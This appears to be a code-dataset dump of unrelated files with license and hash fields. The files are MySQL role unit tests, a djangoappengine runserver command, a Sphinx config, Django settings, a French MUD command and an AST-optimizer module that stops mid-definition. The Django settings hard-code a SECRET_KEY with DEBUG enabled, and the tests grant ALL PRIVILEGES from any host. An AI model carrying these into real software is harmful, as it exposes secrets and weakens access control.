self.assertEqual(mock_yum.ensure_package_installed.mock_calls, [
call('mysql-server'),
call('mysql-devel'),
call('mysql-libs'),
])
@istest
def gets_user_hosts(self):
with self.execute_mock() as execute:
execute.return_value = HOSTS_FOR_USER
hosts = self.role.get_user_hosts('root')
self.assertEqual(hosts, [
'127.0.0.1',
'::1',
'my-desktop',
'localhost',
])
execute.assert_called_with('''mysql -u root -E -e "select Host from mysql.user where LOWER(User)='root'" mysql''',
sudo=True, stdout=False)
@istest
def gets_user_hosts_using_password(self):
with self.execute_mock() as execute:
execute.return_value = HOSTS_FOR_USER
self.role.mysql_root_pass = 'mypass'
hosts = self.role.get_user_hosts('root')
self.assertEqual(hosts, [
'127.0.0.1',
'::1',
'my-desktop',
'localhost',
])
execute.assert_called_with('''mysql -u root --password="mypass" -E -e "select Host from mysql.user where LOWER(User)='root'" mysql''',
sudo=True, stdout=False)
@istest
def gets_empty_user_hosts(self):
with self.execute_mock() as execute:
execute.return_value = ''
hosts = self.role.get_user_hosts('root')
self.assertEqual(hosts, [])
execute.assert_called_with('''mysql -u root -E -e "select Host from mysql.user where LOWER(User)='root'" mysql''',
sudo=True, stdout=False)
@istest
def checks_that_a_user_exists(self):
with patch.object(self.role, 'get_user_hosts') as get_user_hosts:
get_user_hosts.return_value = ['localhost']
self.assertTrue(self.role.user_exists('johndoe', 'localhost'))
get_user_hosts.assert_called_with('johndoe')
@istest
def checks_that_a_user_doesnt_exist(self):
with patch.object(self.role, 'get_user_hosts') as get_user_hosts:
get_user_hosts.return_value = ['localhost']
self.assertFalse(self.role.user_exists('johndoe', 'somewhere-else'))
get_user_hosts.assert_called_with('johndoe')
@istest
def creates_a_user_if_it_doesnt_exist_yet(self):
with patch.object(self.role, 'user_exists') as user_exists, self.execute_mock() as execute:
user_exists.return_value = False
result = self.role.ensure_user('johndoe', 'mypass', 'localhost')
self.assertTrue(result)
execute.assert_called_with("""mysql -u root -e "CREATE USER 'johndoe'@'localhost' IDENTIFIED BY 'mypass';" mysql""", sudo=True, stdout=False)
@istest
def doesnt_create_user_if_it_already_exists(self):
with patch.object(self.role, 'user_exists') as user_exists, self.execute_mock() as execute:
user_exists.return_value = True
result = self.role.ensure_user('johndoe', 'mypass', 'localhost')
self.assertFalse(result)
self.assertFalse(execute.called)
@istest
def creates_a_user_with_mysql_password(self):
with patch.object(self.role, 'user_exists') as user_exists, self.execute_mock() as execute:
user_exists.return_value = False
self.role.mysql_root_pass = 'otherpass'
result = self.role.ensure_user('johndoe', 'mypass', 'localhost')
self.assertTrue(result)
execute.assert_called_with("""mysql -u root --password="otherpass" -e "CREATE USER 'johndoe'@'localhost' IDENTIFIED BY 'mypass';" mysql""",
sudo=True, stdout=False)
@istest
def checks_that_a_database_is_present(self):
with self.execute_mock() as execute:
execute.return_value = DATABASES
result = self.role.is_database_present('performance_schema')
self.assertTrue(result)
execute.assert_called_with('mysql -u root -E -e "SHOW DATABASES" mysql', stdout=False, sudo=True)
@istest
def checks_that_a_database_is_not_present(self):
with self.execute_mock() as execute:
execute.return_value = DATABASES
result = self.role.is_database_present('bad_bad_database')
self.assertFalse(result)
execute.assert_called_with('mysql -u root -E -e "SHOW DATABASES" mysql', stdout=False, sudo=True)
@istest
def checks_that_a_database_is_not_present_when_there_is_none(self):
with self.execute_mock() as execute:
execute.return_value = ''
result = self.role.is_database_present('performance_schema')
self.assertFalse(result)
execute.assert_called_with('mysql -u root -E -e "SHOW DATABASES" mysql', stdout=False, sudo=True)
@istest
def creates_a_database_if_it_doesnt_exist_yet(self):
with patch.object(self.role, 'is_database_present') as is_database_present, self.execute_mock() as execute:
is_database_present.return_value = False
result = self.role.ensure_database('my_data')
self.assertTrue(result)
execute.assert_called_with('mysql -u root -e "CREATE DATABASE my_data" mysql', sudo=True, stdout=False)
@istest
def doesnt_create_a_database_if_it_already_exists(self):
with patch.object(self.role, 'is_database_present') as is_database_present, self.execute_mock() as execute:
is_database_present.return_value = True
result = self.role.ensure_database('my_data')
self.assertFalse(result)
self.assertFalse(execute.called)
@istest
def grants_privilege_if_not_granted_yet(self):
with patch.object(self.role, 'has_grant') as has_grant, self.execute_mock() as execute:
has_grant.return_value = False
result = self.role.ensure_grant('ALL PRIVILEGES', on='foo', username='john', login_from='%', with_grant_option=False)
self.assertTrue(result)
execute.assert_called_with('''mysql -u root -e "GRANT ALL PRIVILEGES ON foo.* TO 'john'@'%'" mysql''', stdout=False, sudo=True)
@istest
def grants_privilege_if_not_granted_yet_for_table(self):
with patch.object(self.role, 'has_grant') as has_grant, self.execute_mock() as execute:
has_grant.return_value = False
result = self.role.ensure_grant('ALL PRIVILEGES', on='foo.bar', username='john', login_from='%', with_grant_option=False)
self.assertTrue(result)
execute.assert_called_with('''mysql -u root -e "GRANT ALL PRIVILEGES ON foo.bar TO 'john'@'%'" mysql''', stdout=False, sudo=True)
@istest
def grants_privilege_with_grant_option_if_not_granted_yet(self):
with patch.object(self.role, 'has_grant') as has_grant, self.execute_mock() as execute:
has_grant.return_value = False
result = self.role.ensure_grant('ALL PRIVILEGES', on='foo', username='john', login_from='%', with_grant_option=True)
self.assertTrue(result)
execute.assert_called_with('''mysql -u root -e "GRANT ALL PRIVILEGES ON foo.* TO 'john'@'%' WITH GRANT OPTION" mysql''', stdout=False, sudo=True)
@istest
def doesnt_grant_privilege_if_already_granted(self):
with patch.object(self.role, 'has_grant') as has_grant, self.execute_mock() as execute:
has_grant.return_value = True
result = self.role.ensure_grant('ALL PRIVILEGES', on='foo', username='john', login_from='%', with_grant_option=True)
self.assertFalse(result)
self.assertFalse(execute.called)
|
mit
| -8,831,662,025,980,692,000
| 41.702899
| 157
| 0.6075
| false
| 3.586732
| true
| false
| false
|
danpetrikin/djangoappengine_rdbms
|
management/commands/runserver.py
|
1
|
7269
|
from optparse import make_option
import logging
import sys
from django.db import connections
from ...boot import PROJECT_DIR
from ...db.backend.base import DatabaseWrapper
from django.core.management.base import BaseCommand
from django.core.management.commands.runserver import BaseRunserverCommand
from django.core.exceptions import ImproperlyConfigured
from google.appengine.tools import dev_appserver_main
from django.core.management import call_command
class Command(BaseRunserverCommand):
"""Overrides the default Django runserver command.
Instead of starting the default Django development server this command
fires up a copy of the full fledged App Engine dev_appserver that emulates
the live environment your application will be deployed to.
"""
option_list = BaseCommand.option_list + (
make_option('--debug', action='store_true', default=False,
help='Prints verbose debugging messages to the console while running.'),
make_option('--debug_imports', action='store_true', default=False,
help='Prints debugging messages related to importing modules, including \
search paths and errors.'),
make_option('-c', '--clear_datastore', action='store_true', default=False,
help='Clears the datastore data and history files before starting the web server.'),
make_option('--high_replication', action='store_true', default=False,
help='Use the high replication datastore consistency model.'),
make_option('--require_indexes', action='store_true', default=False,
help="""Disables automatic generation of entries in the index.yaml file. Instead, when
the application makes a query that requires that its index be defined in the
file and the index definition is not found, an exception will be raised,
similar to what would happen when running on App Engine."""),
make_option('--enable_sendmail', action='store_true', default=False,
help='Uses the local computer\'s Sendmail installation for sending email messages.'),
make_option('--datastore_path',
help="""The path to use for the local datastore data file. The server creates this file
if it does not exist."""),
make_option('--history_path',
help="""The path to use for the local datastore history file. The server uses the query
history file to generate entries for index.yaml."""),
make_option('--login_url',
help='The relative URL to use for the Users sign-in page. Default is /_ah/login.'),
make_option('--smtp_host',
help='The hostname of the SMTP server to use for sending email messages.'),
make_option('--smtp_port',
help='The port number of the SMTP server to use for sending email messages.'),
make_option('--smtp_user',
help='The username to use with the SMTP server for sending email messages.'),
make_option('--smtp_password',
help='The password to use with the SMTP server for sending email messages.'),
make_option('--use_sqlite', action='store_true', default=False,
help='Use the new, SQLite datastore stub.'),
)
help = 'Runs a copy of the App Engine development server.'
args = '[optional port number, or ipaddr:port]'
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``OptionParser`` which will be used to
parse the arguments to this command.
"""
# hack __main__ so --help in dev_appserver_main works OK.
sys.modules['__main__'] = dev_appserver_main
return super(Command, self).create_parser(prog_name, subcommand)
def run_from_argv(self, argv):
"""
Captures the program name, usually "manage.py"
"""
self.progname = argv[0]
super(Command, self).run_from_argv(argv)
def run(self, *args, **options):
"""
Starts the App Engine dev_appserver program for the Django project.
The appserver is run with default parameters. If you need to pass any special
parameters to the dev_appserver you will have to invoke it manually.
Unlike the normal devserver, does not use the autoreloader as
App Engine dev_appserver needs to be run from the main thread
"""
args = []
# Set bind ip/port if specified.
if self.addr:
args.extend(["--address", self.addr])
if self.port:
args.extend(["--port", self.port])
# If runserver is called using handle(), progname will not be set
if not hasattr(self, 'progname'):
self.progname = "manage.py"
# Add email settings
from django.conf import settings
if not options.get('smtp_host', None) and not options.get('enable_sendmail', None):
args.extend(['--smtp_host', settings.EMAIL_HOST,
'--smtp_port', str(settings.EMAIL_PORT),
'--smtp_user', settings.EMAIL_HOST_USER,
'--smtp_password', settings.EMAIL_HOST_PASSWORD])
# Pass the application specific datastore location to the server.
preset_options = {}
for name in connections:
connection = connections[name]
if isinstance(connection, DatabaseWrapper):
args.extend(["--mysql_user", connection.settings_dict.get("USER")])
args.extend(["--mysql_password", connection.settings_dict.get("PASSWORD")])
#args.extend(["--mysql_port", "root")
#args.extend(["--mysql_host", "root")
preset_options = connection.settings_dict.get('DEV_APPSERVER_OPTIONS', {})
break
# Process the rest of the options here
bool_options = ['debug', 'debug_imports', 'clear_datastore', 'require_indexes',
'high_replication', 'enable_sendmail', 'use_sqlite',]
for opt in bool_options:
if options[opt] != False:
args.append("--%s" % opt)
str_options = ['datastore_path', 'history_path', 'login_url', 'smtp_host', 'smtp_port',
'smtp_user', 'smtp_password',]
for opt in str_options:
if options.get(opt, None) != None:
args.extend(["--%s" % opt, options[opt]])
# Fill any non-overridden options with presets from settings
for opt, value in preset_options.items():
arg = "--%s" % opt
if arg not in args:
if value and opt in bool_options:
args.append(arg)
elif opt in str_options:
args.extend([arg, value])
# TODO: issue warning about bogus option key(s)?
# Reset logging level to INFO as dev_appserver will spew tons of debug logs
logging.getLogger().setLevel(logging.INFO)
logging.info(args)
logging.info(PROJECT_DIR)
# Append the current working directory to the arguments.
dev_appserver_main.main([self.progname] + args + [PROJECT_DIR])
|
bsd-3-clause
| 2,640,274,047,164,670,000
| 46.207792
| 99
| 0.616729
| false
| 4.58612
| false
| false
| false
|
rodrigob/downhill
|
docs/conf.py
|
1
|
1515
|
import os
import sys
import better
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
#'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
#'sphinx.ext.pngmath',
'sphinx.ext.viewcode',
'numpydoc',
]
autosummary_generate = True
autodoc_default_flags = ['members']
numpydoc_show_class_members = False
numpydoc_show_inherited_class_members = True
source_suffix = '.rst'
source_encoding = 'utf-8-sig'
master_doc = 'index'
project = u'Downhill'
copyright = u'2015, Leif Johnson'
version = '0.3'
release = '0.3.0pre'
exclude_patterns = ['_build']
templates_path = ['_templates']
pygments_style = 'tango'
html_theme = 'better'
html_theme_path = [better.better_theme_path]
html_theme_options = dict(
rightsidebar=False,
inlinecss='',
cssfiles=['_static/style-tweaks.css'],
showheader=True,
showrelbartop=True,
showrelbarbottom=True,
linktotheme=True,
sidebarwidth='15rem',
textcolor='#111',
headtextcolor='#333',
footertextcolor='#333',
ga_ua='',
ga_domain='',
)
html_short_title = 'Home'
html_static_path = ['_static']
def h(xs):
return ['{}.html'.format(x) for x in xs.split()]
html_sidebars = {
'index': h('gitwidgets globaltoc sourcelink searchbox'),
'**': h('gitwidgets localtoc sourcelink searchbox'),
}
intersphinx_mapping = {
'python': ('https://docs.python.org/3.4/', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None),
'scipy': ('http://docs.scipy.org/doc/scipy/reference/', None),
}
|
mit
| -1,181,340,417,915,678,700
| 23.435484
| 66
| 0.667327
| false
| 3.036072
| false
| false
| false
|
pmutale/www.mutale.nl
|
settings/core.py
|
1
|
1265
|
import os
gettext = lambda s: s
DATA_DIR = os.path.dirname(os.path.dirname(__file__))
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.17.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qs7s_mqq@1d6uz%rj@q((#p@a^%hzemhhjoh4nolyr^n5t3-k!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
ADMINS = [('Peter', 'webmaster@mutale.nl'), ('Peter', 'peter@mutale.nl')]
ROOT_URLCONF = 'mysite.urls'
WSGI_APPLICATION = 'mysite.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'nl'
TIME_ZONE = 'Europe/Amsterdam'
USE_I18N = True
USE_L10N = True
USE_TZ = True
|
unlicense
| 6,090,058,569,688,771,000
| 24.3
| 73
| 0.731225
| false
| 2.908046
| false
| false
| false
|
vlegoff/tsunami
|
src/primaires/commerce/commandes/questeur/deposer.py
|
1
|
4847
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# create of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this create of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le paramètre 'déposer' de la commande 'questeur'."""
from primaires.commerce.transaction import Transaction
from primaires.interpreteur.masque.parametre import Parametre
class PrmDeposer(Parametre):
"""Commande 'questeur déposer'.
"""
def __init__(self):
"""Constructeur du paramètre"""
Parametre.__init__(self, "déposer", "deposit")
self.schema = "<nombre> <nom_objet>"
self.aide_courte = "dépose de l'argent"
self.aide_longue = \
"Cette commande permet de déposer de l'argent dans les " \
"coffres d'un questeur. Vous devez vous trouvez dans la " \
"salle permettant l'opération et avoir l'argent désiré sur " \
"vous. Vous devez préciser d'abord le nombre de pièces " \
"à déposer et ensuite le nom de la pièce (|cmd|bronze|ff| " \
"par exemple). Notez que les questeurs se réservent un " \
"pourcentage plus ou moins important sur ce que vous leur " \
"confiez."
def ajouter(self):
"""Méthode appelée lors de l'ajout de la commande à l'interpréteur"""
nom_objet = self.noeud.get_masque("nom_objet")
nom_objet.proprietes["conteneurs"] = \
"(personnage.equipement.inventaire_simple.iter_objets_qtt()" \
", )"
nom_objet.proprietes["quantite"] = "True"
def interpreter(self, personnage, dic_masques):
"""Interprétation du paramètre"""
salle = personnage.salle
if not importeur.commerce.questeur_existe(salle):
personnage << "|err|Aucun questeur n'est présent là où " \
"vous vous trouvez.|ff|"
return
questeur = importeur.commerce.questeurs[salle]
somme = dic_masques["nombre"].nombre
objet = dic_masques["nom_objet"].objet
if not objet.est_de_type("argent"):
personnage << "|err|Ceci n'est pas de l'argent.|ff|"
return
prototype = objet
argent = Transaction.get_argent(personnage)
if prototype not in argent:
personnage << "|err|Vous ne possédez pas cela.|ff|" # improbable
return
if somme > argent[prototype]:
somme = argent[prototype]
if questeur.servant is None:
personnage << "|err|Personne n'est présent pour s'en charger.|ff|"
return
if prototype not in questeur.monnaies:
personnage << "|err|Vous ne pouvez déposer cette monnaie " \
"dans ce questeur.|ff|"
return
total = somme * prototype.m_valeur
if total < questeur.montant_min:
personnage << "|err|Vous ne pouvez déposer si peu.|ff|"
return
montant = questeur.deposer(personnage, prototype, somme)
if montant == 0:
personnage << "|err|Vous ne pouvez pas déposer cette somme.|ff|"
else:
personnage.envoyer("{{}} entrepose votre argent dans ses " \
"coffres et ajoute {} pièces de bronze sur votre " \
"compte.".format(montant), questeur.servant)
|
bsd-3-clause
| -7,925,732,464,028,695,000
| 43.183486
| 79
| 0.643065
| false
| 3.517896
| false
| false
| false
|
haypo/fatoptimizer
|
fatoptimizer/tools.py
|
1
|
20707
|
import ast
import collections
import marshal
import sys
FLOAT_TYPES = (int, float)
COMPLEX_TYPES = FLOAT_TYPES + (complex,)
STR_TYPES = (bytes, str)
# Primitive Python types (not containers)
PRIMITIVE_TYPES = (type(None), bool, int, float, complex, bytes, str)
# Iterable types
ITERABLE_TYPES = (str, bytes, tuple, frozenset, list, set, dict)
# Maximum length of a "short" AST dump, limit used by error_what() and default
# limit of compact_dump()
COMPACT_DUMP_MAXLEN = 100
# Marker used for "not set" value, different than None
UNSET = object()
class OptimizerError(Exception):
pass
class OptimizerStep:
pass
def compact_ascii(value, maxlen=30):
text = ascii(value)
if len(text) > maxlen:
text = text[:maxlen] + '(...)'
return text
def compact_dump(node, maxlen=COMPACT_DUMP_MAXLEN):
if isinstance(node, list):
return repr([compact_dump(node_item, maxlen) for node_item in node])
node_repr = ast.dump(node)
if len(node_repr) > maxlen:
node_repr = node_repr[:maxlen] + '(...)'
return node_repr
# FIXME: replace it with FindNodes, see unroll.py
def _iter_all_ast(node):
yield node
for field, value in ast.iter_fields(node):
if isinstance(value, list):
for item in value:
if isinstance(item, ast.AST):
for child in _iter_all_ast(item):
yield child
elif isinstance(value, ast.AST):
for child in _iter_all_ast(value):
yield child
def ast_contains(tree, obj_type):
if isinstance(tree, list):
return any(ast_contains(node, obj_type) for node in tree)
else:
return any(isinstance(node, obj_type) for node in _iter_all_ast(tree))
def copy_node(node):
new_node = type(node)()
for field, value in ast.iter_fields(node):
setattr(new_node, field, value)
for attr in node._attributes:
try:
value = getattr(node, attr)
except AttributeError:
pass
else:
setattr(new_node, attr, value)
return new_node
def get_constant_size(value):
return len(marshal.dumps(value))
def _is_constant(value):
if isinstance(value, (tuple, frozenset)):
return all(_is_constant(item) for item in value)
else:
return isinstance(value, PRIMITIVE_TYPES)
def _new_constant(node, value):
if isinstance(value, ast.AST):
# convenient shortcut: return the AST object unchanged
return value
# FIXME: test the config directly here?
if value is None:
new_node = ast.Constant(value=None)
elif isinstance(value, (bool, int, float, complex, str, bytes)):
new_node = ast.Constant(value=value)
elif isinstance(value, (tuple, frozenset)):
if not _is_constant(value):
raise TypeError("container items are not constant: %r" % (value,))
new_node = ast.Constant(value=value)
elif isinstance(value, list):
elts = [_new_constant(node, elt) for elt in value]
new_node = ast.List(elts=elts, ctx=ast.Load())
elif isinstance(value, dict):
keys = []
values = []
for key, value in value.items():
keys.append(_new_constant(node, key))
values.append(_new_constant(node, value))
new_node = ast.Dict(keys=keys, values=values, ctx=ast.Load())
elif isinstance(value, set):
elts = [_new_constant(node, elt) for elt in value]
new_node = ast.Set(elts=elts, ctx=ast.Load())
else:
raise TypeError("unknown type: %s" % type(value).__name__)
copy_lineno(node, new_node)
return new_node
# FIXME: use functools.singledispatch?
def _get_constant(node, *, types=None):
if isinstance(node, ast.Constant):
return node.value
if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
# FIXME: rely on constant folding for that!
value = get_constant(node.operand, types=types)
if value is UNSET:
return UNSET
return (-value)
return UNSET
def get_constant(node, *, types=None):
if types is not None:
value = _get_constant(node, types=types)
if not isinstance(value, types):
return UNSET
return value
else:
return _get_constant(node)
def _get_node_list(seq, literal=False):
values = []
for value in seq:
# only get constant items, otherwise optimizations will not produce
# a constant
if literal:
value = _get_literal(value)
else:
value = get_constant(value)
if value is UNSET:
return UNSET
values.append(value)
return values
def _get_literal(node, constant_items=False):
use_literal = (not constant_items)
value = get_constant(node)
if value is not UNSET:
return value
if isinstance(node, ast.Tuple) and use_literal:
elts = _get_node_list(node.elts, literal=True)
if elts is UNSET:
return UNSET
return list(elts)
if isinstance(node, ast.List):
elts = _get_node_list(node.elts, literal=use_literal)
if elts is UNSET:
return UNSET
return list(elts)
if isinstance(node, ast.Set):
# elements must be hashable
elts = _get_node_list(node.elts)
if elts is UNSET:
return UNSET
return set(elts)
if isinstance(node, ast.Dict):
# FIXME: this code is slow, only do it when get_literal() is
# called with types==dict (or dict in types)
# keys musts be hashable
keys = _get_node_list(node.keys)
if keys is UNSET:
return UNSET
values = _get_node_list(node.values, literal=use_literal)
if values is UNSET:
return UNSET
return dict(zip(keys, values))
return UNSET
def get_literal(node, *, constant_items=False, types=None):
if types is not None:
value = _get_literal(node, constant_items)
if not isinstance(value, types):
return UNSET
return value
else:
return _get_literal(node, constant_items)
def _set_lineno(node, lineno, col_offset):
if 'lineno' in node._attributes:
if not hasattr(node, 'lineno'):
node.lineno = lineno
if 'col_offset' in node._attributes:
if not hasattr(node, 'col_offset'):
node.col_offset = col_offset
for child in ast.iter_child_nodes(node):
_set_lineno(child, lineno, col_offset)
def copy_lineno(orig_node, new_node):
_set_lineno(new_node, orig_node.lineno, orig_node.col_offset)
def pretty_dump(node, annotate_fields=True, include_attributes=False,
lineno=False, indent=' '):
"""
Return a formatted dump of the tree in *node*. This is mainly useful for
debugging purposes. The returned string will show the names and the values
for fields. This makes the code impossible to evaluate, so if evaluation is
wanted *annotate_fields* must be set to False. Attributes such as line
numbers and column offsets are not dumped by default. If this is wanted,
*include_attributes* can be set to True.
Recipe written by Alex Leone, January 2010:
http://alexleone.blogspot.fr/2010/01/python-ast-pretty-printer.html
"""
def _format(node, level=0):
if isinstance(node, ast.AST):
fields = [(a, _format(b, level)) for a, b in ast.iter_fields(node)]
if include_attributes and node._attributes:
fields.extend([(a, _format(getattr(node, a), level))
for a in node._attributes])
if lineno and getattr(node, 'lineno', None):
fields.append(('lineno', str(node.lineno)))
return ''.join([
node.__class__.__name__,
'(',
', '.join(('%s=%s' % field for field in fields)
if annotate_fields else
(b for a, b in fields)),
')'])
elif isinstance(node, list):
lines = ['[']
lines.extend((indent * (level + 2) + _format(x, level + 2) + ','
for x in node))
if len(lines) > 1:
lines.append(indent * (level + 1) + ']')
else:
lines[-1] += ']'
return '\n'.join(lines)
return repr(node)
if isinstance(node, list):
nodes = [_format(item, 1) for item in node]
nodes = (',\n' + indent).join(nodes)
spaces = ' ' * (len(indent) - 1)
return '[%s%s]' % (spaces, nodes)
if not isinstance(node, ast.AST):
raise TypeError('expected AST, got %r' % node.__class__.__name__)
return _format(node)
class NodeVisitorMeta(type):
def __new__(mcls, name, bases, namespace):
self_class = super().__new__(mcls, name, bases, namespace)
steps = [cls for cls in self_class.__mro__
if OptimizerStep in cls.__bases__]
# AST object name (ex: 'Name') => list of visitors
self_class._fullvisitors = collections.defaultdict(list)
self_class._visitors = collections.defaultdict(list)
for step in steps:
for name in dir(step):
if name.startswith('fullvisit_'):
key = name[10:]
func = getattr(step, name)
self_class._fullvisitors[key].append(func)
elif name.startswith('visit_'):
key = name[6:]
func = getattr(step, name)
self_class._visitors[key].append(func)
for name in dir(self_class):
if name.startswith('fullvisit_'):
key = name[10:]
func = getattr(self_class, name)
visitors = self_class._fullvisitors[key]
if func not in visitors:
visitors.append(func)
elif name.startswith('visit_'):
key = name[6:]
func = getattr(self_class, name)
visitors = self_class._visitors[key]
if func not in visitors:
visitors.append(func)
return self_class
class BaseNodeVisitor(metaclass=NodeVisitorMeta):
def __init__(self, filename):
self.filename = filename
def error_what(self, node):
return compact_dump(node, COMPACT_DUMP_MAXLEN)
def error_where(self, node):
where = self.filename
if hasattr(node, 'lineno'):
where = '%s:%s' % (where, node.lineno)
return where
def _call_visitor_method(self, visitor, node):
"""Call visitor(node).
Wrap exceptions to add more context on error.
OptimizerError exceptions are not catched.
"""
try:
return visitor(self, node)
except (OptimizerError, RecursionError):
raise
except Exception as exc:
what = self.error_what(node)
where = self.error_where(node)
raise OptimizerError("error at %s on visiting %s: %s"
% (where, what, exc))
class NodeVisitor(BaseNodeVisitor, ast.NodeVisitor):
"""Node visitor.
Differences with ast.NodeVisitor:
- Compute the mapping AST node name => list of methods when the class
is instanciated
- Support 'full' visitors (method name prefixed with 'fullvisit_') which
skip the call the generic_visit() and so give a full control
- If an exception is raised, it is wrapped into a new OptimizerError
which adds the location in the file (filename and line number)
of the current proceed AST node.
"""
def visit(self, node):
key = node.__class__.__name__
# "full" visitor calling generic_visit() internally?
if key in self._fullvisitors:
visitors = self._fullvisitors[key]
for visitor in visitors:
self._call_visitor_method(visitor, node)
else:
# visit attributes
new_node = self.generic_visit(node)
assert new_node is not UNSET
if new_node is not None:
node = new_node
if key in self._visitors:
# visit the node
visitors = self._visitors[key]
for visitor in visitors:
self._call_visitor_method(visitor, node)
class NodeTransformer(BaseNodeVisitor):
"""Node visitor.
Differences with ast.NodeTransformer:
- Create a new tree if at least one attribute is modified, so the input
tree is left unchanged
- Inherit advantages of NodeVisitor compared to ast.NodeVisitor
Creating a new tree is needed to be able to specialize a function:
basically, return [original_tree, specialized_tree].
"""
def optimize_node_list(self, node_list):
return node_list
def _visit_attr(self, parent_node, attr_name, node):
return self.visit(node)
def generic_visit(self, node, ignore_fields=None):
fields = {}
modified = False
if ignore_fields:
if isinstance(ignore_fields, str):
ignore_fields = {ignore_fields}
else:
ignore_fields = set(ignore_fields)
for field, value in ast.iter_fields(node):
if ignore_fields is not None and field in ignore_fields:
fields[field] = value
continue
if isinstance(value, list):
values = value
new_values = []
all_ast = True
for value in values:
if isinstance(value, ast.AST):
new_value = self._visit_attr(node, field, value)
modified |= (new_value != value)
if isinstance(new_value, list):
new_values.extend(new_value)
else:
new_values.append(new_value)
else:
# arguments.kw_defaults contains AST nodes
# (ex: Constant) and non-AST nodes (ex: None)
all_ast = False
new_values.append(value)
if all_ast:
value = new_values
new_values = self.optimize_node_list(new_values)
modified |= (new_values is not value)
value = new_values
elif isinstance(value, ast.AST):
old_value = value
value = self._visit_attr(node, field, value)
modified |= (value != old_value)
# Create a dictionary of fields used if any field is modified
# to create a new AST node
fields[field] = value
if modified:
# create a new AST node with the new fields
new_node = type(node)()
if 'lineno' in node._attributes:
copy_lineno(node, new_node)
for field, value in fields.items():
setattr(new_node, field, value)
return new_node
return node
def visit(self, node):
key = node.__class__.__name__
# "full" visitor calling generic_visit() internally?
if key in self._fullvisitors:
visitors = self._fullvisitors[key]
for visitor in visitors:
new_node = self._call_visitor_method(visitor, node)
if new_node is not None:
assert new_node is not UNSET
if type(new_node) != type(node):
# AST node type changed
return new_node
else:
node = new_node
else:
new_node = self.generic_visit(node)
assert new_node is not UNSET
if new_node is not None:
node = new_node
if key in self._visitors:
visitors = self._visitors[key]
for visitor in visitors:
new_node = self._call_visitor_method(visitor, node)
if new_node is not None:
assert new_node is not UNSET
if type(new_node) != type(node):
# AST node type changed
return new_node
else:
node = new_node
return node
def visit_node_list(self, node_list):
assert isinstance(node_list, list)
new_node_list = []
for node in node_list:
new_node = self.visit(node)
assert new_node is not None and new_node is not UNSET
if isinstance(new_node, list):
new_node_list.extend(new_node)
else:
new_node_list.append(new_node)
return new_node_list
class RestrictToFunctionDefMixin:
# don't visit children of nodes having their own namespace
def fullvisit_DictComp(self, node):
return node
def fullvisit_ListComp(self, node):
return node
def fullvisit_SetComp(self, node):
return node
def fullvisit_GeneratorExp(self, node):
return node
def fullvisit_FunctionDef(self, node):
return node
def fullvisit_AsyncFunctionDef(self, node):
return node
def fullvisit_Lambda(self, node):
return node
def fullvisit_ClassDef(self, node):
return node
class FindStrVisitor(NodeVisitor, RestrictToFunctionDefMixin):
"""Find Str nodes.
Find all Str nodes to compute constants.
"""
def __init__(self, filename):
super().__init__(filename)
self.str_constants = set()
@classmethod
def from_node(cls, filename, node):
visitor = cls(filename)
visitor.visit(node)
return visitor
def visit_Str(self, node):
self.str_constants.add(node.s)
# FIXME: add optional RestrictToFunctionDefMixin, see UnrollStep, unroll.py
class FindNodes:
"""Find AST nodes."""
def __init__(self, ast_types, callback):
self.ast_types = ast_types
self.callback = callback
def visit(self, node):
if isinstance(node, self.ast_types):
res = self.callback(node)
if not res:
return False
return self.generic_visit(node)
def generic_visit(self, node):
for field, value in ast.iter_fields(node):
if isinstance(value, list):
for item in value:
if isinstance(item, ast.AST):
res = self.visit(item)
if not res:
return False
elif isinstance(value, ast.AST):
res = self.visit(value)
if not res:
return False
return True
class ReplaceVariable(NodeTransformer, RestrictToFunctionDefMixin):
def __init__(self, filename, name_mapping):
super().__init__(filename)
# Mapping (dict or whatever): old name => new name
self.name_mapping = name_mapping
def replace_func_def(self, node):
return self.generic_visit(node)
def visit_Name(self, node):
if node.id not in self.name_mapping:
return node
new_value = self.name_mapping[node.id]
return _new_constant(node, new_value)
def Call(**kw):
